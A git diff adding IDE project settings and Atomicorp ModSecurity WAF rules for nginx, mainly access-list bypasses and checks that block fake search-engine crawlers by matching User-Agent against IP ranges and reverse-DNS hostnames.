diff --git a/.idea/.gitignore b/.idea/.gitignore
new file mode 100644
index 0000000..13566b8
--- /dev/null
+++ b/.idea/.gitignore
@@ -0,0 +1,8 @@
+# Default ignored files
+/shelf/
+/workspace.xml
+# Editor-based HTTP Client requests
+/httpRequests/
+# Datasource local storage ignored files
+/dataSources/
+/dataSources.local.xml
diff --git a/.idea/misc.xml b/.idea/misc.xml
new file mode 100644
index 0000000..3ce3588
--- /dev/null
+++ b/.idea/misc.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="MarkdownSettingsMigration">
+    <option name="stateVersion" value="1" />
+  </component>
+</project>
\ No newline at end of file
diff --git a/.idea/modsecurity.iml b/.idea/modsecurity.iml
new file mode 100644
index 0000000..c956989
--- /dev/null
+++ b/.idea/modsecurity.iml
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="WEB_MODULE" version="4">
+  <component name="NewModuleRootManager">
+    <content url="file://$MODULE_DIR$" />
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+  </component>
+</module>
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
new file mode 100644
index 0000000..1b1da66
--- /dev/null
+++ b/.idea/modules.xml
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectModuleManager">
+    <modules>
+      <module fileurl="file://$PROJECT_DIR$/.idea/modsecurity.iml" filepath="$PROJECT_DIR$/.idea/modsecurity.iml" />
+    </modules>
+  </component>
+</project>
\ No newline at end of file
diff --git a/.idea/php.xml b/.idea/php.xml
new file mode 100644
index 0000000..f6159c8
--- /dev/null
+++ b/.idea/php.xml
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="PhpProjectSharedConfiguration" php_language_level="7.3" />
+</project>
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
new file mode 100644
index 0000000..94a25f7
--- /dev/null
+++ b/.idea/vcs.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="VcsDirectoryMappings">
+    <mapping directory="$PROJECT_DIR$" vcs="Git" />
+  </component>
+</project>
\ No newline at end of file
diff --git a/nginx-waf/00_asl_accesslist.conf b/nginx-waf/00_asl_accesslist.conf
new file mode 100644
index 0000000..97d4379
--- /dev/null
+++ b/nginx-waf/00_asl_accesslist.conf
@@ -0,0 +1,32 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+#
+# Created by Prometheus Global (http://www.prometheus-group.com)
+# Copyright 2005-2019 by Atomicorp, Inc. all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+# Disable rules for hosts on the always allow list
+# Be *VERY* careful about whom is set to always allow
+#Include IP list and do not scan or block
+SecRule REMOTE_ADDR "@ipMatchFromFile /etc/asl/accesslist" "rev:1,id:345679,phase:1,t:none,nolog,noauditlog,allow,ctl:ruleEngine=Off,ctl:auditEngine=Off"
diff --git a/nginx-waf/00_asl_whitelist.conf b/nginx-waf/00_asl_whitelist.conf
new file mode 100644
index 0000000..77ae6ec
--- /dev/null
+++ b/nginx-waf/00_asl_whitelist.conf
@@ -0,0 +1,38 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+#
+# Created by Prometheus Global (http://www.prometheus-group.com)
+# Copyright 2005-2019 by Atomicorp, Inc. all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+#######################################
+#
+#  This file has been deprecated by 00_asl_accesslist.conf
+#
+#######################################
+# Disable rules for hosts on the whitelist
+# Be *VERY* careful about whom is whitelisted.
+#Include whitelisted IPs and do not scan or block
+SecRule REMOTE_ADDR "@ipMatchFromFile /etc/asl/whitelist" "rev:1,id:345678,phase:1,t:none,nolog,noauditlog,allow,ctl:ruleEngine=Off,ctl:auditEngine=Off"
+#SecRule REMOTE_ADDR "@pmFromFile /etc/asl/whitelist" "rev:1,id:345678,phase:1,t:none,nolog,noauditlog,allow,ctl:ruleEngine=Off,ctl:auditEngine=Off"
diff --git a/nginx-waf/00_asl_x_searchengines.conf b/nginx-waf/00_asl_x_searchengines.conf
new file mode 100644
index 0000000..d6c3fe5
--- /dev/null
+++ b/nginx-waf/00_asl_x_searchengines.conf
@@ -0,0 +1,39 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Created by Prometheus Global (http://www.prometheus-group.com)
+# Copyright 2012-2019 by Atomicorp, Inc. all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+#
+# Note:  These rules will not work without this apache setting
+#
+# HostnameLookups Double
+
+SecAction "phase:1,t:none,nolog,noauditlog,setvar:tx.WHITELIST_SEARCH_ENGINES=1,pass,id:318744,tag:'no_ar'"
diff --git a/nginx-waf/00_asl_y_searchengines.conf b/nginx-waf/00_asl_y_searchengines.conf
new file mode 100644
index 0000000..2a861db
--- /dev/null
+++ b/nginx-waf/00_asl_y_searchengines.conf
@@ -0,0 +1,241 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Copyright 2013-2017 Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+#
+# Note:  These rules will not work without this apache setting
+#
+# HostnameLookups Double
+
+#Modsecurity 2.8.0 has a nasty bug that makes it not work with ipmatch rules
+#so we cant let these rules load in 2.8.0 boxes
+#SecRule MODSEC_BUILD "@gt 020777900" #phase:1,id:333772,rev:1,t:none,nolog,pass,skipAfter:END_SEARCH_ENGINE
+
+SecRule REQUEST_HEADERS:User-Agent "@pm googlebot bingbot yahoo yeti hailoobot technoratibot friendfeedbot newsgator blogscope gist bloglines/ netvibes yandex friendfeedbot/ baiduspider/ mediapartners-google Feedfetcher-Google Twitterbot"         "id:318745,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:333722,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_SEARCH_ENGINE"
+
+#Twitterbot
+#199.59.148.0/22
+SecRule REQUEST_HEADERS:User-Agent "Twitterbot"         "id:338746,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:334904,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_TWITTER"
+
+SecRule REMOTE_HOST "@ipmatch 199.59.148.0/24"         "id:343917,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecRule REMOTE_HOST "\.twttr\.com$" 	"id:303831,severity:'2',rev:1,t:none,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake twitter bot',phase:1"
+
+#Real MSN search engine
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'339331',t:none,nolog,noauditlog,allow"
+SecMarker END_TWITTER
+
+#User-Agent: Feedly/1.0 (+http://www.feedly.com/fetcher.html; like FeedFetcher-Google)
+SecRule REQUEST_HEADERS:User-Agent "^Feedly"         "id:303990,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:303991,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_FEEDLY"
+
+
+SecRule REMOTE_HOST "@ipmatch 65.19.138.0/26,8.29.198.0/24" "id:323978,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecRule REMOTE_HOST "!@endsWith .feedly.com"        "capture,id:303890,severity:'2',rev:4,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: Fake Feedly webcrawler',phase:1,logdata:'%{TX.0}'"
+
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303992',t:none,nolog,noauditlog,allow"
+
+SecMarker END_FEEDLY
+
+
+#Google
+SecRule REQUEST_HEADERS:User-Agent "^(?:Googlebot-richsnippets|OnPageBot)" 	"phase:1,id:323931,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_GOOGLE"
+
+SecRule REQUEST_HEADERS:User-Agent "@pm googlebot mediapartners-google"         "id:323900,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:333901,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_GOOGLE"
+
+#74.125.0.0/16 is registered to google, but does not have a PTR record
+#66.249.64.0/19 is google
+SecRule REMOTE_HOST "@ipmatch 74.125.0.0/16,66.249.64.0/19,173.194.0.0/16"         "id:323918,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecRule REMOTE_HOST "!@endsWith .googlebot.com" 	"capture,id:303800,rev:3,severity:'2',t:none,t:lowercase,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: Fake Googlebot webcrawler',phase:1,logdata:'%{TX.0}'"
+
+#Real Google Search Engine
+#Allow all from google
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303902',t:none,nolog,noauditlog,allow"
+SecMarker END_GOOGLE
+
+#Feedfetcher-Google
+SecRule REQUEST_HEADERS:User-Agent "@contains Feedfetcher-Google"         "id:303947,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:343948,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_GOOGLE2"
+
+SecRule REMOTE_HOST "@ipmatch 74.125.0.0/16,66.249.64.0/19"         "id:323928,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecRule REMOTE_HOST "!@endsWith .google.com" 	"capture,id:303833,severity:'2',rev:5,t:none,t:lowercase,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: Fake Google Feedfetcher webcrawler',phase:1,logdata:'%{TX.0}'"
+
+#Allow all from google
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303935',t:none,nolog,noauditlog,allow"
+SecMarker END_GOOGLE2
+
+#MSN search engine
+SecRule REQUEST_HEADERS:User-Agent "@pm msnbot bingbot"         "id:318746,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:333904,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_MSN"
+
+SecRule REMOTE_HOST "@ipmatch 157.54.0.0/15,207.46.0.0/16,40.124.0.0/16,40.96.0.0/12,40.112.0.0/13,40.125.0.0/17,40.74.0.0/15,40.120.0.0/14,40.80.0.0/12,40.76.0.0/14"         "id:323917,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecRule REMOTE_HOST "!(^msnbot-[0-9]+-[0-9]+-[0-9]+-[0-9]+\.search\.msn\.com$)" 	"capture,id:303801,severity:'2',rev:6,t:none,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake msnbot/bingbot webcrawler',phase:1,logdata:'%{TX.0}'"
+#SecRule REMOTE_HOST "!(^msnbot-[0-9]+-[0-9]+-[0-9]+-[0-9]+\.search\.msn\.com$|^131\.253\.[2-4][0-9]\.[0-9]+$)" 
+#Real MSN search engine
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303903',t:none,nolog,noauditlog,allow"
+SecMarker END_MSN
+
+#Yahoo Slurp engine
+SecRule REQUEST_HEADERS:User-Agent "@contains yahoo! slurp"         "id:323904,rev:1,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:333905,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_YAHOO"
+
+#China Yahoo ranges
+#110.75.160.0 - 110.75.191.255
+#110.75.171.0 - 110.75.176.255
+#
+#Other yahoo ranges
+#98.136.0.0/14
+SecRule REMOTE_HOST "@ipmatch 110.75.160.0/19,98.136.0.0/14,68.180.128.0/17,217.146.179.0/24"         "id:323914,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecRule REMOTE_HOST "!(\.yahoo\.(?:net|com)$)" 	"id:303802,severity:'2',rev:5,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake Yahoo! Slurp webcrawler',phase:1"
+
+#Real Yahoo Slurp engine
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303906',t:none,nolog,noauditlog,allow"
+SecMarker END_YAHOO
+
+SecRule REQUEST_HEADERS:User-Agent "@contains yahoo pipes"         "id:303907,rev:1,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:333908,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_YAHOO2"
+
+SecRule REMOTE_HOST "!(\.yahoo\.(?:com|net)$)" 	"id:303803,severity:'2',rev:2,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake Yahoo Pipes webcrawler',phase:1"
+
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303908',t:none,nolog,noauditlog,allow"
+SecMarker END_YAHOO2
+
+SecRule REQUEST_HEADERS:User-Agent "@beginsWith Yeti/"         "id:303909,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:318749,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_YETI"
+
+#SecRule REMOTE_HOST "@ipmatch 61.247.192.0/19" #        "id:323916,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecRule REMOTE_HOST "!(^crawl-[0-9]+-[0-9]+-[0-9]+-[0-9]+\.naver\.jp$)" 	"id:303804,severity:'2',rev:4,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake Yeti webcrawler',phase:1"
+#SecRule REMOTE_HOST "!(^crawl-[0-9]+-[0-9]+-[0-9]+-[0-9]+\.naver\.jp$|^61\.247\.(19[2-9]|2[0-2][0-3])\.[0-9]{1,3}$" #
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303910',t:none,nolog,noauditlog,allow"
+SecMarker END_YETI
+
+SecRule REQUEST_HEADERS:User-Agent "@contains hailoobot"         "id:303913,rev:1,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:333911,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_HAIL"
+
+SecRule REMOTE_HOST "!@endswith webcrawler.hailoo.com"         "id:303805,severity:'2',rev:1,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake Hailoobot webcrawler.',phase:1"
+
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303912',t:none,nolog,noauditlog,allow"
+SecMarker END_HAIL
+
+SecRule REQUEST_HEADERS:User-Agent "@contains technoratibot/"         "id:303915,rev:1,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:333915,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_TECHNO"
+
+SecRule REMOTE_HOST "!@endswith .crawler.technorati.com"         "id:303806,severity:'2',rev:1,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake Technoratibot webcrawler.',phase:1"
+
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303916',t:none,nolog,noauditlog,allow"
+SecMarker END_TECHNO
+
+SecRule REQUEST_HEADERS:User-Agent "@contains friendfeedbot/"         "id:303917,rev:1,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:333918,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_FACEBOOK"
+
+SecRule REMOTE_HOST "!@endsWith .facebook.com"         "id:303807,severity:'2',rev:1,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake FriendFeed/Facebook webcrawler',phase:1"
+
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303919',t:none,nolog,noauditlog,allow"
+SecMarker END_FACEBOOK
+
+SecRule REQUEST_HEADERS:User-Agent "yandex(?:bot|images|blog)"         "id:303920,rev:2,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:303921,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_YANDEX"
+
+SecRule REMOTE_HOST "@ipmatch 95.108.158.128/25"         "id:323916,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecRule REMOTE_HOST "!(\.yandex\.(?:ru|com|net)$)"         "id:303808,severity:'2',rev:2,t:none,t:lowercase,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake Yandex webcrawler.',phase:1"
+
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303900',t:none,nolog,noauditlog,allow"
+SecMarker END_YANDEX
+
+SecRule REQUEST_HEADERS:User-Agent "@contains bloglines/"         "id:313921,rev:1,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:313922,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_BLOGLINES"
+
+SecRule REMOTE_HOST "!@streq crawler.bloglines.com" 	"id:303810,severity:'2',rev:1,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake Bloglines webcrawler.',phase:1"
+
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303901',t:none,nolog,noauditlog,allow"
+SecMarker END_BLOGLINES
+
+SecRule REQUEST_HEADERS:User-Agent "@contains gist server"         "id:303924,rev:1,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:303925,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_GIST"
+
+SecRule REMOTE_HOST "!@endsWith .gist.com" 	"id:303811,severity:'2',rev:1,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake Gist webcrawler',phase:1"
+
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303922',t:none,nolog,noauditlog,allow"
+SecMarker END_GIST
+
+SecRule REQUEST_HEADERS:User-Agent "@contains blogscope"         "id:303927,rev:1,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:303928,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_BLOGSCOPE"
+
+SecRule REMOTE_HOST "!@endsWith .toronto.edu" 	"id:303812,severity:'2',rev:1,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake BlogScope webcrawler',phase:1"
+
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303923',t:none,nolog,noauditlog,allow"
+SecMarker END_BLOGSCOPE
+
+SecRule REQUEST_HEADERS:User-Agent "newsgator/2\.0 bot"         "id:303930,rev:2,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:303931,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_NEWSGATOR"
+
+SecRule REMOTE_HOST "!@endsWith .newsgator.com"          "id:303813,severity:'2',rev:1,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake NewsGatorOnline webcrawler',phase:1"
+
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303904',t:none,nolog,noauditlog,allow"
+SecMarker END_NEWSGATOR
+
+SecRule REQUEST_HEADERS:User-Agent "@contains netvibes"         "id:303933,rev:1,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:303934,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_NETVIBES"
+
+SecRule REMOTE_HOST "!@endsWith .netvibes.com"         "id:303814,severity:'2',rev:1,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake Netvibes webcrawler',phase:1"
+
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303905',t:none,nolog,noauditlog,allow"
+SecMarker END_NETVIBES
+
+#Baidu seems to have a broken resolver
+#The forward record never resolves
+#
+#nslookup baiduspider-180-76-5-87.crawl.baidu.com
+#** server can't find baiduspider-180-76-5-87.crawl.baidu.com: NXDOMAIN
+#nslookup 180.76.5.87
+#87.5.76.180.in-addr.arpa	name = baiduspider-180-76-5-87.crawl.baidu.com.
+#So some known static ranges are added
+#inetnum: 180.76.0.0 - 180.76.255.255
+#netname: Baidu
+#
+#inetnum: 123.125.71.0 - 123.125.71.255
+#netname: SADF
+#123.122.0.0 - 123.122.15.255
+#119.63.192.0 - 119.63.199.255
+#202.46.32.0 - 202.46.63.255
+SecRule REQUEST_HEADERS:User-Agent "@contains baiduspider/"         "id:303936,rev:1,phase:1,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:323937,rev:1,t:none,pass,nolog,noauditlog,skipAfter:END_BAIDU"
+
+SecRule REMOTE_HOST "@ipmatch 180.76.0.0/16,123.122.0.0/20,123.125.71.0/24,119.63.192.0/21,220.181.0.0/16,202.46.32.0/19,185.10.104.0/22"         "id:323915,rev:1,phase:1,t:none,pass,nolog,noauditlog,skip:1"
+SecRule REMOTE_HOST "!(\.crawl\.baidu\.com$)"         "id:303937,severity:'2',rev:7,t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Fake Baidu webcrawler',phase:1"
+
+#SecRule REMOTE_HOST "!(\.crawl\.baidu\.com$|^180\.76\.[0-9]+\.[0-9]+$|^123\.125\.71\.[0-9]+$|^220\.181\.[0-9]+\.[0-9]+$|123\.122\.[0-15]\.[0-9]+$|^119\.63\.19[2-9]\.[0-9]+$)" 
+SecRule TX:WHITELIST_SEARCH_ENGINES "@eq 1" "phase:1,id:'303938',t:none,nolog,noauditlog,allow"
+SecMarker END_BAIDU
+
+SecMarker END_SEARCH_ENGINE
diff --git a/nginx-waf/00_asl_z_aa_threat_intelligence.conf b/nginx-waf/00_asl_z_aa_threat_intelligence.conf
new file mode 100644
index 0000000..de1870c
--- /dev/null
+++ b/nginx-waf/00_asl_z_aa_threat_intelligence.conf
@@ -0,0 +1,52 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# TI rules
+#
+# Created by Prometheus Global (http://www.prometheus-group.com)
+# Copyright 2014-2019 by Atomicorp, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
